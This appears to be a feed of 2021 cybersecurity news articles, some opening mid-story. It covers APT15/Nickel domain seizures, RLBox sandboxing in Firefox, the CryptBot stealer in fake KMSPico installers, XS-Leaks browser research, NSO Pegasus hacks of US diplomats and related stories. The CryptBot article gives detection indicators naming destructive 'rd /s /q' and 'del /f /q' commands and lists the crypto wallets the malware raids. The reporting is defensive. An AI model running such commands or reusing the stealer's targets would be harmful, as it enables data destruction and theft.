The Redmond company attributed the malicious activities to a group it pursues as Nickel, and by the wider cybersecurity industry under the monikers APT15, Bronze Palace, Ke3Chang, Mirage, Playful Dragon, and Vixen Panda. The advanced persistent threat (APT) actor is believed to have been active since at least 2012.

"Nickel has targeted organizations in both the private and public sectors, including diplomatic organizations and ministries of foreign affairs in North America, Central America, South America, the Caribbean, Europe and Africa," Microsoft's Corporate Vice President for Customer Security and Trust, Tom Burt, said. "There is often a correlation between Nickel's targets and China's geopolitical interests."

The rogue infrastructure enabled the hacking crew to maintain long-term access to the compromised machines and execute attacks for intelligence gathering purposes targeting unnamed government agencies, think tanks, and human rights organizations as part of a digital espionage campaign dating back to September 2019.

Microsoft painted the cyber assaults as "highly sophisticated" that used a multitude of techniques, including breaching remote access services and exploiting vulnerabilities in unpatched VPN appliances as well as Exchange Server and SharePoint systems to "insert hard-to-detect malware that facilitates intrusion, surveillance and data theft."

Upon gaining an initial foothold, Nickel has been found deploying credential dumping tools and stealers such as Mimikatz and WDigest to hack into victim accounts, followed by delivering custom malware that allowed the actor to maintain persistence on victim networks over extended periods of time and conduct regularly scheduled exfiltration of files, execute arbitrary shellcode, and collect emails from Microsoft 365 accounts using compromised credentials.

The multiple backdoor families used for command and control are being tracked as Neoichor, Leeson, NumbIdea, NullItch, and Rokum.

The latest wave of attacks adds to an extensive list of surveillanceware campaigns mounted by the APT15 group in recent years. In July 2020, mobile security firm Lookout disclosed four trojanized legitimate apps — named SilkBean, DoubleAgent, CarbonSteal, and GoldenEagle — that targeted the Uyghur ethnic minority and the Tibetan community with the goal of gathering and transmitting personal user data to adversary-operated command-and-control servers.

"As China's influence around the world continues to grow and the nation establishes bilateral relations with more countries and extends partnerships in support of China's Belt and Road Initiative, we assess that China-based threat actors will continue to target customers in government, diplomatic, and NGO sectors to gain new insights, likely in pursuit of economic espionage or traditional intelligence collection objectives," Microsoft said.

Source

Also: Microsoft Seizes 42 Domains Used by Chinese Hacking Group Nickel.

RLBox increases browser security by separating third-party libraries that are vulnerable to attacks from the rest of the browser to contain potential damage—a practice called sandboxing.

Browsers like Firefox rely on third-party libraries to support different functionalities—from XML parsing, to spell checking and font rendering. These libraries are often written in low-level programming languages, like C, and, unfortunately, introducing vulnerabilities in C code is extremely easy.

RLBox protects users from inevitable vulnerabilities in these libraries and supply-chain attacks that exploit these libraries.

"Well-funded attackers are exploiting zero-day vulnerabilities and supply chains to target real users," said Deian Stefan, an assistant professor in UC San Diego's Computer Science and Engineering department. "To deal with such sophisticated attackers we need multiple layers of defense and new techniques to minimize how much code we need to trust (to be secure). We designed RLBox exactly for this."

The team's effort to deploy RLBox on all Firefox platforms is detailed in a recent Mozilla Hacks blog post.

With RLBox, developers can retrofit systems like Firefox to put modules, like third-party libraries, in a fine-grained software sandbox. Like process-based sandboxing, which browsers use to isolate one site from another, software sandboxing ensures that bugs in the sandboxed module will not create security vulnerabilities—bugs are contained to the sandbox. "Unlike process-based sandboxing, though, RLBox's sandboxing technique makes it possible for developers to isolate tightly coupled modules like Graphite and Expat without huge engineering or performance costs," said Shravan Narayan, the UC San Diego computer science Ph.D. student leading the project.

WebAssembly and sandboxing

At its core, the RLBox framework consists of two components. The first is the sandboxing technique itself: RLBox uses WebAssembly (Wasm). Specifically, RLBox compiles modules to WebAssembly and then compiles Wasm to native code using the fast and portable wasm2c compiler. "By compiling to Wasm before native code, we get sandboxing for free: We can ensure that all memory access and control flow will be instrumented to be confined to the module boundary," said Narayan.

Wasm also makes it possible for RLBox to optimize calls into and out of sandboxed code into simple function calls. In an upcoming study, to be published in the proceedings of the 2022 ACM SIGPLAN Principles of Programming Languages Symposium, the researchers show that this is safe because Wasm satisfies a set of theoretical conditions called "zero-cost conditions." This is unlike most other sandboxing techniques, which require glue code at the sandbox-application boundary to be secure. This glue code is error-prone and, in some cases, contributes to large performance overheads—the team's Wasm compiler elides this glue code, its complexity, and its overhead.

Tainted type system

The second key component of RLBox is its tainted type system. Sophisticated attackers can break out of the Wasm sandbox if the code interfacing with the sandboxed code—the Firefox code—does not carefully validate all the data that comes out of the sandbox. RLBox's type system, which is implemented using C++ metaprogramming, prevents such attacks by marking all data coming out of the sandbox as "tainted" and ensuring, through compiler errors, that developers sanitize potentially unsafe data before using it. "Without such a type system, it would be extremely difficult to ensure that developers put all the right checks in all the right places," said Stefan.

"RLBox is a big win for Firefox and our users," said Bobby Holley, Distinguished Engineer at Mozilla. "It protects our users from accidental defects as well as supply-chain attacks, and it reduces the need for us to scramble when such issues are disclosed upstream."

The team's original work on RLBox was published in the proceedings of the USENIX Security Symposium last March. Since then they've been working on bringing RLBox to all Firefox users. RLBox will ship on all Firefox platforms, desktop and mobile, sandboxing five different modules: Graphite, Hunspell, Ogg, Expat and Woff2. The team is actively working on sandboxing more modules in future versions of Firefox and supporting use cases beyond Firefox.

Source

"When enabled, all new one-on-one chats you or another person start will be set to disappear at your chosen duration, and we've added a new option when creating a group chat that lets you turn it on for groups you create," WhatsApp said. "This new feature is optional and does not change or delete any of your existing chats."

Today, with the launch of default disappearing messages, the company also added two new durations that allow setting up messages to disappear after 24 hours or 90 days.

You can enable disappearing messages by default for all new one-to-one chats on iOS and Android devices by going to WhatsApp Settings, tapping Account > Privacy > Default message timer, and selecting a duration.

However, if you want to permanently have access to one of your chats in the future, you also have the choice to switch back to standard chats where disappearing messages are not enabled.

"For people who choose to switch on default disappearing messages, we will display a message in your chats that tells people this is the default you've chosen," the company added.

"This makes clear it's nothing personal – it's a choice you've made about how you want to communicate with everyone on WhatsApp moving forward."

The company, however, warned that enabling disappearing messages won't protect them from being forwarded to others by untrusted individuals as they can still be saved (screenshotted or copied) before they're removed from the chat.

This comes after the introduction of disappearing messages one year ago, in November 2020, with all new messages sent to a chat set to disappear after seven days if the feature was enabled by one of the recipients in one-to-one conversations or by an admin in group chats.

In August, Facebook also added the option to set photos and videos to immediately disappear after being viewed once for additional control over one's privacy.

Last but not least, in October, WhatsApp also rolled out end-to-end encrypted chat backups on iOS and Android to block anyone from accessing chats, regardless of where they are stored.

These changes came after WhatsApp backtracked on earlier decisions to restrict features or delete the accounts of users who disagreed with a new privacy policy requiring them to share their data with other Facebook companies.

"We believe disappearing messages along with end-to-end encryption are two crucial features that define what it means to be a private messaging service today, and bring us one step closer to the feeling of an in-personal conversation," WhatsApp concluded today.

WhatsApp adds default disappearing messages for new chats

Mozilla said this new method of sandboxing, which uses WebAssembly to isolate potentially-buggy code, builds on a prototype that was shipped in Firefox 74 and Firefox 75 to Linux and Mac users respectively. With Firefox 95, RLBox will be deployed on all supported Firefox platforms including desktop and mobile to isolate three different modules: Graphite, Hunspell, and Ogg. With Firefox 96, two more modules, Expat and Woff2, will also be isolated.

Commenting on the next steps for RLBox, Mozilla engineer Bobby Holley said:

“RLBox is a big win for us on several fronts: it protects our users from accidental defects as well as supply-chain attacks, and it reduces the need for us to scramble when such issues are disclosed upstream. As such, we intend to continue applying to more components going forward. Some components are not a good fit for this approach — either because they depend too much on sharing memory with the rest of the program, or because they’re too performance-sensitive to accept the modest overhead incurred — but we’ve identified a number of other good candidates.”

It should also be noted that the company has updated its bug bounty program so that researchers are paid for bypassing the sandbox even if there are no vulnerabilities in the isolated library; this will help tighten up the browser’s security further. If you’d like to learn more of the technical aspects behind RLBox, be sure to check out the Mozilla Hacks post.

Firefox 95 will include RLBox sandboxing for added security

For this, it is necessary to sign-in to a Firefox Monitor account, or create a new one, and click on the join waitlist button of the new data removal feature of the service.

Little is known about the functionality of the service at this point. Two questions are answered by Mozilla.

Why remove your personal information?

When your personal information is online, you might be an easier target for identity theft, fraud, or even cyberstalking. Advertisers, companies, and hackers can quickly figure out a lot of information about you, like your name, home address, family information, or even social security numbers and passwords.

How do we remove it?

We are creating a privacy service to monitor websites for your personal information and remove it from sites that put you and your loved ones at risk. It’s not available yet, but click below if you are interested in finding out more.

Many questions are left unanswered right now, including:

• The definition of personal information, what does it include? Are we speaking about textual information only, e.g. name, address and social security numbers, or also media, e.g. leaked photos?
• The scope of the service. Is Mozilla monitoring the entire Internet for leaks, or it the data removal service limited to certain major sites, such as Facebook or Twitter, at least initially?
• How are removals handled? Is this an automated process, or, more likely in my opinion, do users need to give Mozilla's service permission to request the removal of data for each source individually?

Closing Words

Firefox Monitor's new data removal service adds more value to the service. It is a good addition to the service, if Mozilla gets it right. It seems improbable that the organization is monitoring the entire Internet for personal information of its users, and it is unclear whether Mozilla is creating the service from scratch or partnering with an established data removal service instead. Will the new personal information feature be free of charge? Mozilla is running several paid services already, e.g. Mozilla VPN or Pocket, and it is possible that the data removal service won't be free of charge, or will be limited.

All in all, it could give Firefox Monitor a boost, especially when compared to the other password leak solutions that are available on the Internet.

Firefox Monitor may remove personal information now from the Internet

In their attacks, the Nickel threat actor (also tracked as KE3CHANG, APT15, Vixen Panda, Royal APT, and Playful Dragon) compromised the servers of government organizations, diplomatic entities, and non-governmental organizations (NGOs) across 29 countries, mainly from Europe and Latin America.

"Nickel has targeted organizations in both the private and public sectors, including diplomatic organizations and ministries of foreign affairs in North America, Central America, South America, the Caribbean, Europe and Africa," said Tom Burt, Corporate Vice President for Customer Security & Trust at Microsoft.

"We believe these attacks were largely being used for intelligence gathering from government agencies, think tanks, and human rights organizations."

Microsoft was able to take down Nickel's infrastructure after the US District Court for the Eastern District of Virginia granted an order following a complaint filed on December 2 (the list of seized domains is available here).

According to the court's order (which also contains the list of seized sites), the domains were redirected "to secure servers by changing the authoritative name servers to NS104a.microsoftintemetsafety.net and NS104b.microsoftintemetsafety.net."

Microsoft's Digital Crimes Unit (DCU) first spotted the threat group behind these malicious domains in 2016. Mandiant tracks them as Ke3chang and says they've been active since at least 2010.

Since 2019, it was observed targeting government entities across Latin America and Europe by Microsoft's Threat Intelligence Center (MSTIC) and Digital Security Unit (DSU).

Nickel's end goal is to deploy malware on compromised servers which enables its operators to monitor their victims' activity, as well as collect data and exfiltrate it to servers under their control.

These Chinese-backed hackers use compromised third-party VPN (virtual private network) suppliers, credentials stolen in spear-phishing campaigns, and exploits targeting unpatched on-premises Exchange Server and SharePoint servers to hack into their targets' networks.

More info on the hacking group's malicious activity and indicators of compromise including domains used in their attacks can be found here.

"To date, in 24 lawsuits – five against nation-state actors – we’ve taken down more than 10,000 malicious websites used by cybercriminals and nearly 600 sites used by nation-state actors," Burt added.

"We have also successfully blocked the registration of 600,000 sites to get ahead of criminal actors that planned to use them maliciously in the future."

In March 2020, the company took control of the U.S.-based infrastructure the Necurs spam botnet used to distribute malware payloads and infect millions of computers.

According to Microsoft, before being taken down, Necurs sent roughly 3.8 million spam messages to more than 40.6 million targets over just 58 days.

Redmond also sued the North Korean-linked Thallium cyber-espionage group in December 2019 and seized 50 domains part of the hacking group's malicious domain infrastructure.

Microsoft’s Digital Crimes Unit also disrupted the Iran-backed APT35 (aka Charming Kitten, Phosphorus, or Ajax Security Team) threat actor in December 2019 after taking over servers used in its cyber attacks.

Previously, Microsoft filed 15 similar cases against the Russian-backed group Strontium (aka Fancy Bear or APT28) in August 2018, which led to the seizure of 91 malicious domains.

Microsoft seizes sites used by APT15 Chinese state hackers

The malware, dubbed "CryptBot," is an information stealer capable of obtaining credentials for browsers, cryptocurrency wallets, browser cookies, credit cards, and capturing screenshots from the infected systems. Deployed via cracked software, the latest attack involves the malware masquerading as KMSPico.

KMSPico is an unofficial tool that's used to illicitly activate the full features of pirated copies of software such as Microsoft Windows and Office products without actually owning a license key.

"The user becomes infected by clicking one of the malicious links and downloading either KMSPico, Cryptbot, or another malware without KMSPico," Red Canary researcher Tony Lambert said in a report published last week. "The adversaries install KMSPico also, because that is what the victim expects to happen, while simultaneously deploying Cryptbot behind the scenes."

The American cybersecurity firm said it also observed several IT departments using illegitimate software instead of legitimate Microsoft licenses to activate systems, adding the altered KMSpico installers are distributed via a number of websites that claim to be offering the "official" version of the activator.

This is far from the first time cracked software has emerged as a conduit for deploying malware. In June 2021, Czech cybersecurity software company Avast disclosed a campaign dubbed "Crackonosh" that involved distributing illegal copies of popular software to illegally abuse the compromised machines to mine cryptocurrency, netting the attacker over $2 million in profits.

Source

Also: Beware: Fake KMSPico Windows activator carries crypto wallet info stealing malware.

Jane McGonigal, an author and developer, wrote a Twitter thread alleging that members of Google’s team “opened a bunch of selfies hoping to find nudes” judging by activity logs Ms McGonigal had access to.

“The photos they opened were of me in bathing suits, sports bras, form-fitting dresses, and of stitches after surgery. They deleted Google security notifications in my backup email accounts”, Ms McGonigal wrote.

“This happened even though I tried to erase the phone and lock the phone from Google’s find my phone service.”

Ms McGonigal went on to say that the “hacker” changed her Gmail settings to mark all security messages as spam, leading to her not being aware of the issue until she checked the folder. The hacker also reportedly changed her passwords.

Google did not respond to a request for comment from The Independent before time of publication but Ms McGonigal has apparently “heard from individuals via backchannel, not officially from Google, that Google is looking into it and it’s getting escalated. She added that she has “not been officially contact by anyone with information or offer to help yet”.

This is apparently not the first issue Ms McGonigal has had with the Pixel repair team. “I have been on Google support and Pixel support dozens of time all week BEFORE the hack happened, asking them to investigate why my phone marked delivered by FedEx ‘disappeared’ at the warehouse”, she tweeted.

It is possible that Google never received the device that Ms McGonigal sent to them, and instead the device was intercepted in transit, she suggested.

FedEx did not respond to a request for comment from The Independent before time of publication.

In most instances it is good practice to completely wipe a device before sending it to be repaired – whether that is by the official manufacturer or a trusted third-party provider. Sometimes, however, this is not possible.

“A consumer can’t factory reset a phone that won’t turn on. I took every other recommended step to secure it including Lock my Phone and Erase my Phone via Google’s FindMyPhone service. It did not work”, Ms McGonigal tweeted.

Source

Collectively known as "XS-Leaks," the browser bugs enable a malicious website to harvest personal data from its visitors as they interact with other websites in the background without the targets' knowledge. The findings are the result of a comprehensive study of cross-site attacks undertaken by a group of academics from Ruhr-Universität Bochum (RUB) and Niederrhein University.

"XS-Leaks bypass the so-called same-origin policy, one of a browser's main defences against various types of attacks," the researchers said in a statement. "The purpose of the same-origin policy is to prevent information from being stolen from a trusted website. In the case of XS-Leaks, attackers can nevertheless recognize individual, small details of a website. If these details are tied to personal data, those data can be leaked."

Stemming from side-channels built into the web platform that permits an attacker to gather this data from a cross-origin HTTP resource, the cross-site bugs impact an array of popular browsers such as Tor, Chrome, Edge, Opera, Safari Firefox, Samsung Internet, spanning across different operating systems Windows, macOS, Android, and iOS.

The new class of vulnerabilities is also different from a cross-site request forgery (CSRF) attack in that unlike the latter, which exploits a web application's trust in a browser client to execute unintended actions on behalf of the user, they can be weaponized to infer information about a user.

"They are a significant threat to Internet privacy since simply visiting a web page may reveal if the victim is a drug addict or leak a sexual orientation," the researchers explained. "XS-Leaks take advantage of small pieces of information which are exposed during interactions between websites […] to reveal sensitive information about users, such as their data in other web applications, details about their local environment, or internal networks they are connected to."

The core idea is that while websites are not allowed to directly access data (i.e., read server responses) on other websites because of same-origin constraints, a rogue online portal can attempt to load a specific resource or an API endpoint from a website, say, an online banking website, on the user's browser and draw inferences about the victim's transaction history. Alternatively, the source of the leak could be timing-based side-channels or speculative execution attacks like Meltdown and Spectre.

As mitigations, the researchers recommend denying all event handler messages, minimizing error message occurrences, applying global limit restrictions, and creating a new history property when redirection occurs. At the end-user side, turning on first-party isolation as well as Enhanced Tracking Prevention in Firefox have been found to decrease the applicability of XS-Leaks. Intelligent Tracking Prevention in Safari, which blocks third-party cookies by default, also prevents all leaks that are not based on a pop-up.

"The root cause of most XS-Leaks is inherent to the design of the web," the researchers said. "Oftentimes applications are vulnerable to some cross-site information leaks without having done anything wrong. It is challenging to fix the root cause of XS-Leaks at the browser level because in many cases doing so would break existing websites."

Source

This activity has been spotted by researchers at Red Canary, who warn that pirating software to save on licensing costs isn't worth the risk.

KMSPico is a popular Microsoft Windows and Office product activator that emulates a Windows Key Management Services (KMS) server to activate licenses fraudulently.

According to Red Canary, many IT departments using KMSPico instead of legitimate Microsoft software licenses are much bigger than one would expect.

"We've observed several IT departments using KMSPico instead of legitimate Microsoft licenses to activate systems," explained Red Canary intelligence analyst Tony Lambert. 

"In fact, we even experienced one ill-fated incident response engagement where our IR partner could not remediate one environment due to the organization not having a single valid Windows license in the environment."

Tainted product activators

KMSPico is commonly distributed through pirated software and cracks sites that wrap the tool in installers containing adware and malware.

As you can see below, there are numerous sites created to distribute KMSPico, all claiming to be the official site.

A malicious KMSPico installer analyzed by RedCanary comes in a self-extracting executable like 7-Zip and contains both an actual KMS server emulator and Cryptbot.

"The user becomes infected by clicking one of the malicious links and downloads either KMSPico, Cryptbot, or another malware without KMSPico," explains a technical analysis of the campaign,

"The adversaries install KMSPico also, because that is what the victim expects to happen, while simultaneously deploying Cryptbot behind the scenes."

The malware is wrapped by the CypherIT packer that obfuscates the installer to prevent it from being detected by security software. This installer then launches a script that is also heavily obfuscated, which is capable of detecting sandboxes and AV emulation, so it won't execute when run on the researcher's devices.

Moreover, Cryptobot checks for the presence of "%APPDATA%\Ramson," and executes its self-deletion routine if the folder exists to prevent re-infection.

The injection of the Cryptbot bytes into memory occurs through the process hollowing method, while the malware's operational features overlap with previous research findings.

In summary, Cryptbot is capable of collecting sensitive data from the following apps:

• Atomic cryptocurrency wallet
• Avast Secure web browser
• Brave browser
• Ledger Live cryptocurrency wallet
• Opera Web Browser
• Waves Client and Exchange cryptocurrency applications
• Coinomi cryptocurrency wallet
• Google Chrome web browser
• Jaxx Liberty cryptocurrency wallet
• Electron Cash cryptocurrency wallet
• Electrum cryptocurrency wallet
• Exodus cryptocurrency wallet
• Monero cryptocurrency wallet
• MultiBitHD cryptocurrency wallet
• Mozilla Firefox web browser
• CCleaner web browser
• Vivaldi web browser

Because Cryptbot’s operation doesn’t rely on the existence of unencrypted binaries on the disk, detecting it is only possible by monitoring for malicious behavior such as PowerShell command execution or external network communication.

Red Canary shares the following four key points for threat detection:

• binaries containing AutoIT metadata but don’t have “AutoIT” in their filenames
• AutoIT processes making external network connections
• findstr commands similar to findstr /V /R “^ … $
• PowerShell or cmd.exe commands containing rd /s /q, timeout, and del /f /q together

In summary, if you thought that KSMPico is a smart way to save on unnecessary licensing costs, the above illustrates why that's a bad idea.

The reality is that the loss of revenue due to incident response, ransomware attacks, and cryptocurrency theft from installing pirated software could be more than the cost of the actual Windows and Office licenses.

Malicious KMSPico installers steal your cryptocurrency wallets

The hacks, which took place in the last several months, hit U.S. officials either based in Uganda or focused on matters concerning the East African country, two of the sources said.

The intrusions, first reported here, represent the widest known hacks of U.S. officials through NSO technology. Previously, a list of numbers with potential targets including some American officials surfaced in reporting on NSO, but it was not clear whether intrusions were always tried or succeeded.

Reuters could not determine who launched the latest cyberattacks.

NSO Group said in a statement on Thursday that it did not have any indication their tools were used but canceled access for the relevant customers and would investigate based on the Reuters inquiry.

"If our investigation shall show these actions indeed happened with NSO's tools, such customer will be terminated permanently and legal actions will take place," said an NSO spokesperson, who added that NSO will also "cooperate with any relevant government authority and present the full information we will have."

NSO has long said it only sells its products to government law enforcement and intelligence clients, helping them to monitor security threats, and is not directly involved in surveillance operations.

Officials at the Uganda embassy in Washington did not comment. A spokesperson for Apple declined to comment.

A State Department spokesperson declined to comment on the intrusions, instead pointing to the Commerce Department's recent decision to place the Israeli company on an entity list, making it harder for U.S. companies to do business with them.

NSO Group and another spyware firm were "added to the Entity List based on a determination that they developed and supplied spyware to foreign governments that used this tool to maliciously target government officials, journalists, businesspeople, activists, academics, and embassy workers," the Commerce Department said in an announcement last month.

EASILY IDENTIFIABLE

NSO software is capable of not only capturing encrypted messages, photos and other sensitive information from infected phones, but also turning them into recording devices to monitor surroundings, based on product manuals reviewed by Reuters.

Apple's alert to affected users did not name the creator of the spyware used in this hack.

The victims notified by Apple included American citizens and were easily identifiable as U.S. government employees because they associated email addresses ending in state.gov with their Apple IDs, two of the people said.

They and other targets notified by Apple in multiple countries were infected through the same graphics processing vulnerability that Apple did not learn about and fix until September, the sources said.

Since at least February, this software flaw allowed some NSO customers to take control of iPhones simply by sending invisible yet tainted iMessage requests to the device, researchers who investigated the espionage campaign said.

The victims would not see or need to interact with a prompt for the hack to be successful. Versions of NSO surveillance software, commonly known as Pegasus, could then be installed.

Apple's announcement that it would notify victims came on the same day it sued NSO Group last week, accusing it of helping numerous customers break into Apple's mobile software, iOS.

In a public response, NSO has said its technology helps stop terrorism and that they've installed controls to curb spying against innocent targets.

For example, NSO says its intrusion system cannot work on phones with U.S. numbers beginning with the country code +1.

But in the Uganda case, the targeted State Department employees were using iPhones registered with foreign telephone numbers, said two of the sources, without the U.S. country code.

Uganda has been roiled this year by an election with reported irregularities, protests and a government crackdown. U.S. officials have tried to meet with opposition leaders, drawing ire from the Ugandan government. read more Reuters has no evidence the hacks were related to current events in Uganda.

A senior Biden administration official, speaking on condition he not be identified, said the threat to U.S. personnel abroad was one of the reasons the administration was cracking down on companies such as NSO and pursuing new global discussion about spying limits.

The official added that the government has seen "systemic abuse" in multiple countries involving NSO's Pegasus spyware.

Sen. Ron Wyden, who is on the Senate Intelligence Committee, said: "Companies that enable their customers to hack U.S. government employees are a threat to America's national security and should be treated as such."

Historically, some of NSO Group's best-known past clients included Saudi Arabia, the United Arab Emirates and Mexico.

The Israeli Ministry of Defense must approve export licenses for NSO, which has close ties to Israel's defense and intelligence communities, to sell its technology internationally.

In a statement, the Israeli embassy in Washington said that targeting American officials would be a serious breach of its rules.

"Cyber products like the one mentioned are supervised and licensed to be exported to governments only for purposes related to counter-terrorism and severe crimes," an embassy spokesperson said. "The licensing provisions are very clear and if these claims are true, it is a severe violation of these provisions."

Source

Also:  Pegasus Spyware Reportedly Hacked iPhones of U.S. State Department and Diplomats.

These types of side-channel attacks are called 'XS-Leaks,' and allow attacks to bypass the 'same-origin' policy in web browsers so that a malicious website can steal info in the background from a trusted website where the user enters information.

"The principle of an XS-Leak is to use such side-channels available on the web to reveal sensitive information about users, such as their data in other web applications, details about their local environment, or internal networks they are connected to," explains the XS-Leaks wiki.

For example, an XS-Leak attack could help a background site siphon the email inbox contents from an active tab used for accessing webmail.

Cross-site leaks aren't new, but as the researchers point out, not all of them have been identified and classified as XS-Leaks, and their root cause remains unclear.

Their research aims to systematically search for new XS-Leaks, evaluate potential mitigations, and generally gain a better understanding of how they work.

Finding new XS-Leaks

The researchers first identified three characteristics of cross-site leaks and evaluated all inclusion methods and leak techniques for a large set of web browsers.

The three main ingredients of all XS-Leaks are inclusion methods, leak techniques, and detectable differences.

After creating a model based on the above, the researchers found 34 XS-Leaks, 14 of which were novel (marked with a plus sign below).

Next, they tested the 34 XS-Leaks against 56 combinations of browsers and operating systems to determine how vulnerable each of them was.

Then they built a web application named XSinator, consisting of three components:

1. A testing site that acts as the attacker page, implementing known and novel X-Leaks
2. A vulnerable web app that simulates the behavior of a state-dependent resource.
3. A database containing all previous test results.

You can visit the XSinator page yourself and run the test to see how well your web browser and OS fare against the 34 X-Leaks.

You can find a full list of XS-leaks that various browsers are vulnerable to below:

How to defend against X-Leaks

Mitigating or addressing the risks that arise from these side-channel attacks need to be resolved by browser developers.

Researchers suggest denying all event handler messages, minimizing error message occurrences, applying global limit restrictions, and creating a new history property when redirection occurs.

Other effective mitigation methods are using X-Frame-Options to prevent iframe elements from loading HTML resources and implementing the CORP header to control if pages can embed a resource.

“COIU, also known as First-Party Isolation (FPI), is an optional security feature that users can enable in FF's expert settings (about:config) and was initially introduced in Tor Browser.” - from the paper.

One of the participating researchers, Lukas Knittel, told Bleeping Computer the following:

"Depending on the website, XS-Leaks can have a severe impact on users. Users can use an up-to-date browser that allows them to disable third-party cookies. This would protect against most XS-Leaks, even when the website doesn't implement new mitigations like COOP, CORP, SameSite Cookies, and so on." - Knittel.

The researcher also said they informed the web browser development teams of their findings, who are now fixing the various issues. The problems have already been fixed in the currently-available versions in some cases.

As for future work, the team believes that new browser features constantly add new potential XS-Leak opportunities, so this is a space of constant interest.

Also, Knittel told us that they might explore the development of a website-scanning tool, but for now, they want to focus on determining how common these flaws are in real-world websites.

Researchers discover 14 new data-stealing web browser attacks

Malwarebytes' latest findings go into detail about the new tactics and tools adopted by the APT group known as SideCopy, which is so-called because of its attempts to mimic the infection chains associated with another group tracked as SideWinder and mislead attribution.

"The lures used by SideCopy APT are usually archive files that have embedded one of these files: LNK, Microsoft Publisher or Trojanized Applications," Malwarebytes researcher Hossein Jazi said, adding the embedded files are tailored to target government and military officials based in Afghanistan and India.

The revelation comes close on the heels of disclosures that Meta took steps to block malicious activities carried out by the group on its platform by using romantic lures to compromise individuals with ties to the Afghan government, military, and law enforcement in Kabul.

Some of the prominent attacks were waged against personnel associated with the Administration Office of the President (AOP) of Afghanistan as well as the Ministry of Foreign affairs, Ministry of Finance, and the National Procurement Authority, resulting in the theft of social media passwords and password-protected documents. SideCopy also broke into a shared computer in India and harvested credentials from government and education services.

In addition, the actor is said to have siphoned several Microsoft Office documents, including names, numbers, and email addresses of officials and databases containing information related to identity cards, diplomatic visas, and asset registrations from the Afghani government websites, all of which are expected to be used as future decoys or to fuel further attacks against the individuals themselves.

The cyber espionage campaign observed by Malwarebytes involves the target opening the lure document, leading to the execution of a loader that's used to drop a next-stage remote access trojan called ActionRAT, which is capable of uploading files, executing commands received from a server, and even download more payloads.

Also dropped by the loader is a new information stealer dubbed AuTo Stealer, which is programmed to collect Microsoft Office files, PDF documents, text files, database files, and images before exfiltrating the information to its server over HTTP or TCP.

This is far from the first time SideCopy APT's tactics have come to light. In September 2020, cybersecurity firm Quick Heal revealed specifics about an espionage attack aimed at Indian defense units and armed forces personnel at least since 2019 with an aim to steal sensitive information.

Then earlier this July, Cisco Talos researchers exposed the hacking group's myriad infection chains delivering bespoke and commodity remote access trojans such as CetaRAT, Allakore, and njRAT in what they called an expansion of malware campaigns targeting entities in India.

Source

Windows system admins are reporting [1, 2, 3, 4, 5] that this is happening since updating Microsoft's enterprise endpoint security platform (previously known as Microsoft Defender ATP) definitions to version 1.353.1874.0.

When triggered, Defender for Endpoint will block the file from opening and throw an error mentioning suspicious activity linked to Win32/PowEmotet.SB or Win32/PowEmotet.SC.

"We're seeing issues with definition update 1.353.1874.0 detecting printing as Win32/PowEmotet.SB this afternoon," one admin said.

"We are seeing this detected for Excel, any Office app using MSIP.ExecutionHost.exe ( AIP Sensitivity Client ) and splwow64.exe," another added.

A third one confirmed the issues with today's definition updates: "We're seeing the same behavior specifically with v.1.353.1874.0 of the definitions, which was released today, & included a definition for Behavior:Win32/PowEmotet.SB & Behavior:Win32/PowEmotet.SC."

BleepingComputer was able to trigger the false positive on a Windows 10 virtual machine with the latest Microsoft Defender signatures, as shown below.

While Microsoft hasn't yet shared any info on what causes this, the most likely reason is that the company has increased the sensitivity for detecting Emotet-like behavior in updates released today, which makes Defender's generic behavioral detection engine too sensitive prone to false positives.

The change was likely prompted by the recent revival of the Emotet botnet from two weeks ago, after Emotet research group Cryptolaemus, GData, and Advanced Intel began seeing TrickBot dropping Emotet loaders on infected devices.

Even though this is almost surely not the real thing, the timing is definitely unfortunate with Emotet coming back and most Windows admins already on their toes.

As some of them have reported, they almost took their data centers offline to stop a possible Emotet infection from spreading before realizing that what they were seeing were likely false positives.

Since October 2020, Windows admins had to deal with other Defender for Endpoint including one that showed network devices infected with Cobalt Strike and another that marked Chrome updates as PHP backdoors.

Microsoft has told BleepingComputer that they have fixed the issue for cloud-connected users and working on a fix for everyone else.

"We are working to resolve an issue where some customers may have experienced a series of false-positive detections. This issue has been resolved for cloud-connected customers."  - a Microsoft spokesperson.

Update 11/30/21: Added Microsoft's statement.

Microsoft Defender scares admins with Emotet false positives

Israel has quietly reduced the number of countries to which its companies may sell hacking tools and spyware amid ongoing criticism from its allies over how those technologies are being used.

Calcalist reports that Israeli companies are now restricted to selling cyberweapons to democratic countries throughout Europe, members of the Five Eyes intelligence alliance, and the like. The Record says this brings those companies' potential customers down from 102 countries to 37.

These restrictions follow the US Department of Commerce's addition of two Israeli companies, NSO Group and Candiru, to the Entity List. Being put on that list makes it far more difficult for those companies to access technologies and products created by American businesses.

The Commerce Department says it acted "based on evidence that these entities developed and supplied spyware to foreign governments that used these tools to maliciously target government officials, journalists, businesspeople, activists, academics, and embassy workers."

Those allegations have been levied against the companies—particularly NSO Group—for years. But they came to a head in July when a consortium of organizations led by Forbidden Stories and Amnesty International published a series of reports on the company's Pegasus spyware.

The resulting scrutiny wasn't exclusive to the Commerce Department. Apple recently sued NSO Group in hopes of banning it from using its products again. It's also seeking damages, which it says will be donated to "to organizations pursuing cybersurveillance research and advocacy."

Israel hasn't said why it issued these restrictions on cyberweapons exports, but between the US government's sanctions and a lawsuit filed by one of the world's richest companies, it's not hard to guess why the country suddenly decided to bring its security industry to heel.

Source

In Tel Aviv, a well-known broadcaster panicked as the intimate details of his sex life, and those of hundreds of thousands of others stolen from an L.G.B.T.Q. dating site, were uploaded on social media.

For years, Israel and Iran have engaged in a covert war, by land, sea, air and computer, but the targets have usually been military or government related. Now, the cyberwar has widened to target civilians on a large scale.

In recent weeks, a cyberattack on Iran’s nationwide fuel distribution system paralyzed the country’s 4,300 gas stations, which took 12 days to have service fully restored.

That attack was attributed to Israel by two U.S. defense officials, who spoke on the condition of anonymity to discuss confidential intelligence assessments. It was followed days later by cyberattacks in Israel against a major medical facility and a popular L.G.B.T.Q. dating site, attacks Israeli officials have attributed to Iran.

The escalation comes as American authorities have warned of Iranian attempts to hack the computer networks of hospitals and other critical infrastructure in the United States. As hopes fade for a diplomatic resurrection of the Iranian nuclear agreement, such attacks are only likely to proliferate.

Hacks have been seeping into civilian arenas for months. Iran’s national railroad was attacked in July, but that relatively unsophisticated hack may not have been Israeli. And Iran is accused of making a failed attack on Israel’s water system last year.

The latest attacks are thought to be the first to do widespread harm to large numbers of civilians. Nondefense computer networks are generally less secure than those tied to state security assets.

